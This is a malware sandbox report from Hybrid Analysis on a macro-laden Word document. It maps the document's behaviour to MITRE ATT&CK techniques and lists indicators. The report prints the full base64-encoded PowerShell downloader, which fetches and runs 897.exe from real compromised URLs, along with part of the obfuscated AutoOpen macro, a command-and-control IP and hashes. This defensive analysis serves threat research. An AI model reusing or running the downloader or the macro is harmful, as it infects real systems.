Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'RE_583658295301

malicious

Threat Score: 100/100 AV Detection: 75% Labeled as: Trojan.9FDEFC33 #macros-on-open

RE_583658295301_1004.doc

This report is generated from a file or URL submitted to this webservice on October 4th 2019 20:51:42 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Report False-Positive Request Report Deletion

Incident Response

Risk Assessment

Spyware: POSTs files to a webserver
Persistence: Spawns a lot of processes
Network Behavior: Contacts 1 domain and 1 host. View all details

MITRE ATT&CK™ Techniques Detection

This report has 18 indicators that were mapped to 15 attack techniques and 7 tactics. View all details

Execution
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1035	Service Execution	Execution	Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. Learn more		Contains ability to open/control a service 1 confidential indicators
Persistence
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1179	Hooking	Credential Access Persistence Privilege Escalation	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Learn more			Loads rich edit control libraries Hooks API calls Installs hooks/patches the running process
T1137	Office Application Startup	Persistence	Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. Learn more	Contains embedded VBA macros with keywords that indicate auto-execute behavior		Contains embedded VBA macros (normalized)
T1215	Kernel Modules and Extensions	Persistence	Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Learn more		Contains ability to enumerate processes/modules/threads
T1050	New Service	Persistence Privilege Escalation	When operating systems boot up, they can start programs or applications called services that perform background system functions. Learn more	1 confidential indicators
Privilege Escalation
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1179	Hooking	Credential Access Persistence Privilege Escalation	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Learn more			Loads rich edit control libraries Hooks API calls Installs hooks/patches the running process
T1055	Process Injection	Defense Evasion Privilege Escalation	Process injection is a method of executing arbitrary code in the address space of a separate live process. Learn more	Writes data to a remote process	Allocates virtual memory in a remote process	Found a string that may be used as part of an injection method
T1050	New Service	Persistence Privilege Escalation	When operating systems boot up, they can start programs or applications called services that perform background system functions. Learn more	1 confidential indicators
Defense Evasion
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1112	Modify Registry	Defense Evasion	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in [[Persistence]] and [[Execution]]. Learn more		Modifies proxy settings	Removes Office resiliency keys (often used to avoid problems opening documents)
T1055	Process Injection	Defense Evasion Privilege Escalation	Process injection is a method of executing arbitrary code in the address space of a separate live process. Learn more	Writes data to a remote process	Allocates virtual memory in a remote process	Found a string that may be used as part of an injection method
Credential Access
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1179	Hooking	Credential Access Persistence Privilege Escalation	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Learn more			Loads rich edit control libraries Hooks API calls Installs hooks/patches the running process
Discovery
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1082	System Information Discovery	Discovery	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Learn more		Contains ability to query CPU information
T1120	Peripheral Device Discovery	Discovery	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Learn more		Contains ability to enumerate services
T1010	Application Window Discovery	Discovery	Adversaries may attempt to get a listing of open application windows. Learn more			Scanning for window names
Collection
ATT&CK ID	Name	Tactics	Description	Malicious Indicators	Suspicious Indicators	Informative Indicators
T1114	Email Collection	Collection	Adversaries may target user email to collect sensitive information from a target. Learn more		1 confidential indicators

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 13
External Systems
- Sample was identified as malicious by a large number of Antivirus engines
  
  details
  
  13/59 Antivirus vendors marked sample as malicious (22% detection rate)
  
  source
  
  External System
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  13/59 Antivirus vendors marked sample as malicious (22% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- Document spawns new processes
  
  details
  
  Document spawned a new process (macro present)
  
  source
  
  Indicator Combinations
  
  relevance
  
  7/10
- GETs files from a webserver
  
  details
  
  "GET /2tgmnk/fJZIPCYV/ HTTP/1.1
  Host: www.eteensblog.com
  Connection: Keep-Alive"
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
- The analysis spawned a process that was identified as malicious
  
  details
  
  13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3536) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3372) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 3396) as malicious (classified as "Packed-FVW" with 18% detection rate)
  13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 2400) as malicious (classified as "Packed-FVW" with 18% detection rate)
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Installation/Persistance
- Writes data to a remote process
  
  details
  
  "powershell.exe" wrote 32 bytes to a remote process "%USERPROFILE%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
  "897.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "897.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
  "capprep.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  "capprep.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
  
  source
  
  API Call
  
  relevance
  
  6/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "146.82.206.253": ...
  
  URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV/ (AV positives: 8/71 scanned on 10/04/2019 20:38:08)
  URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV (AV positives: 6/72 scanned on 10/04/2019 18:15:12)
  URL: http://contactlenses.cc/ (AV positives: 2/70 scanned on 07/21/2019 05:51:05)
  URL: http://galleries10.exploitedteens.com/ (AV positives: 1/50 scanned on 11/07/2013 03:56:09)
  File SHA256: 4e2f067e6fba50b24d168515dce7f31da8bd4d3e9f93fa047d404878f338a710 (AV positives: 13/72 scanned on 10/04/2019 20:31:51)
  File SHA256: faabccb1ffe41bc64521776a9ce31eb61725beb8efaad424de61bc6aa432d09c (AV positives: 16/71 scanned on 10/04/2019 20:05:50)
  File SHA256: 3f1f8fd989386c1beddf6223113b18d788f4862325bfae0828080e29e067599b (AV positives: 17/72 scanned on 10/04/2019 18:20:20)
  File SHA256: a6e58fcdd3b8743865c45d8035bcca1f3ebfde77d9ff9139b5a379289a088cd7 (AV positives: 15/73 scanned on 10/04/2019 18:11:19)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  
  details
  
  Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1137 (Show technique in the MITRE ATT&CK™ matrix)
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n "C:\RE_583658295301_1004.doc"" (Show Process)
  Spawned process "powershell.exe" with commandline "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgANAA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA" (Show Process)
  Spawned process "897.exe" (Show Process)
  Spawned process "897.exe" with commandline "--caaf215f" (Show Process)
  Spawned process "capprep.exe" (Show Process)
  Spawned process "capprep.exe" with commandline "--83c0e935" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 22
Anti-Detection/Stealthyness
- Contains ability to open/control a service
  
  details
  
  OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
  OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  8/10
  
  ATT&CK ID
  
  T1035 (Show technique in the MITRE ATT&CK™ matrix)
- Possibly tries to hide a process launching it with different user credentials
  
  details
  
  CreateProcessAsUserW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
  CreateProcessAsUserW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  3/10
Anti-Reverse Engineering
- Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
  
  details
  
  "powershell.exe" is allocating memory with PAGE_GUARD access rights
  "897.exe" is protecting 48760 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 2862 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 15072 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 4 bytes with PAGE_GUARD access rights
  "897.exe" is protecting 1012 bytes with PAGE_GUARD access rights
  "capprep.exe" is protecting 48760 bytes with PAGE_GUARD access rights
  "capprep.exe" is protecting 2862 bytes with PAGE_GUARD access rights
  
  source
  
  API Call
  
  relevance
  
  10/10
Environment Awareness
- Contains ability to enumerate services
  
  details
  
  EnumServicesStatusExW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
  EnumServicesStatusExW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  7/10
  
  ATT&CK ID
  
  T1120 (Show technique in the MITRE ATT&CK™ matrix)
- Contains ability to query CPU information
  
  details
  
  cpuid from 897.exe (PID: 3536) (Show Stream)
  cpuid from 897.exe (PID: 3372) (Show Stream)
  cpuid from capprep.exe (PID: 3396) (Show Stream)
  cpuid from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1082 (Show technique in the MITRE ATT&CK™ matrix)
General
- POSTs files to a webserver
  
  details
  
  "POST /dma/usbccid/sess/ HTTP/1.1
  Referer: http://172.105.11.15/dma/usbccid/sess/
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 172.105.11.15:8080
  Content-Length: 475
  Connection: Keep-Alive
  Cache-Control: no-cache" with no payload
  
  source
  
  Network Traffic
  
  relevance
  
  5/10
- The analysis extracted a file that was identified as malicious
  
  details
  
  13/69 Antivirus vendors marked dropped file "897.exe" as malicious (classified as "Packed-FVW" with 18% detection rate)
  
  source
  
  Binary File
  
  relevance
  
  10/10
Installation/Persistance
- Allocates virtual memory in a remote process
  
  details
  
  "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
  
  source
  
  API Call
  
  relevance
  
  7/10
  
  ATT&CK ID
  
  T1055 (Show technique in the MITRE ATT&CK™ matrix)
- Contains ability to download files from the internet
  
  details
  
  InternetReadFile@WININET.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
- Creates new processes
  
  details
  
  "897.exe" is creating a new process (Name: "%USERPROFILE%\897.exe", Handle: 364)
  "capprep.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\capprep.exe", Handle: 260)
  
  source
  
  API Call
  
  relevance
  
  8/10
- Opens the MountPointManager (often used to detect additional infection locations)
  
  details
  
  "powershell.exe" opened "\Device\MountPointManager"
  "897.exe" opened "\Device\MountPointManager"
  
  source
  
  API Call
  
  relevance
  
  5/10
Network Related
- Found potential IP address in binary/memory
  
  details
  
  "172.105.11.15"
  
  source
  
  File/Memory
  
  relevance
  
  3/10
- Sends traffic on typical HTTP outbound port, but without HTTP header
  
  details
  
  TCP traffic to 146.82.206.253 on port 80 is sent without HTTP header
  
  source
  
  Network Traffic
  
  relevance
  
  5/10
- Uses a User Agent typical for browsers, although no browser was ever launched
  
  details
  
  Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Pattern Matching
- Contains ability to download files from the internet
  
  details
  
  InternetReadFile@WININET.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
Spyware/Information Retrieval
- Contains ability to enumerate processes/modules/threads
  
  details
  
  CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
  CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
  CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
  CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
  
  ATT&CK ID
  
  T1215 (Show technique in the MITRE ATT&CK™ matrix)
System Security
- Modifies proxy settings
  
  details
  
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "capprep.exe" (Access type: "SETVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1112 (Show technique in the MITRE ATT&CK™ matrix)
Unusual Characteristics
- Contains ability to flush the cache line
  
  details
  
  clflush byte ptr [FFFFFFFFC592F8FFh] from powershell.exe (PID: 2684) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
- Contains embedded VBA macros with suspicious keywords
  
  details
  
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "VIRTUAL" which indicates: "May detect virtualization"
  Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "system" which indicates: "May run an executable file or a system command on a Mac (if combined with libc.dylib)"
  Found suspicious keyword "ShowWindow" which indicates: "May hide the application"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Invokes a process with a very long commandline
  
  details
  
  "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgANAA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA" on 2019-10-4.22:53:14.617
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 25
Environment Awareness
- Contains ability to query the machine version
  
  details
  
  RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3536) (Show Stream)
  RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3372) (Show Stream)
  RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 3396) (Show Stream)
  RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Possibly tries to detect the presence of a debugger
  
  details
  
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
General
- Contacts domains
  
  details
  
  "www.eteensblog.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "146.82.206.253:80"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains PDB pathways
  
  details
  
  "powershell.pdb"
  
  source
  
  File/Memory
  
  relevance
  
  1/10
- Contains embedded VBA macros
  
  details
  
  File "virtualjnt.cls" (Streampath: "Macros/VBA/virtualjnt") has code: ""
  File "bluezij.bas" (Streampath: "Macros/VBA/bluezij") has code: "Function Surinamenjp()
  On Error Resume Next
  '/Floridazun
  'Lead 24/365 interfaces Uzbekistan action-items CSS Awesome Soft Table District facilitate violet
  Azerbaijanian_Manatsjt = "Solutions Illinois solution Personal Loan Account Facilitator connect Illinois Practical Fresh Pants overriding backing up Factors"
  '/Rieljfm
  While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
  'transform viral Wooden web-enabled Borders Incredible hacking national magnetic utilize Prairie Tools & Health
  Savings_Accountjhd = Azerbaijanian_Manatsjt + CInt(256) 'Alabama Venezuela Views Generic Fresh Mouse Egypt IB Bedfordshire Games
  'quantify bandwidth Unbranded Cotton Tuna Central bandwidth mobile Home Loan Account collaborative Turkmenistan Concrete
  multibytecji = Azerbaijanian_Manatsjt + Len("402") 'Face to face Rustic Awesome Malawi Metal Tactics Personal Loan Account programming robust black
  'Wooden Steel Pound Sterling demand-driven Incredible Granite Keyboard Sleek Plastic Table Supervisor neural Cotton
  Directorfjt = Azerbaijanian_Manatsjt + CInt(475) 'scalable Sleek Plastic Chicken index Investment Account bus Wooden Small Granite Bacon end-to-end engineer Soft artificial intelligence
  'Knoll National Implemented Handmade Soft Chair Dynamic Customer Reunion bandwidth channels communities
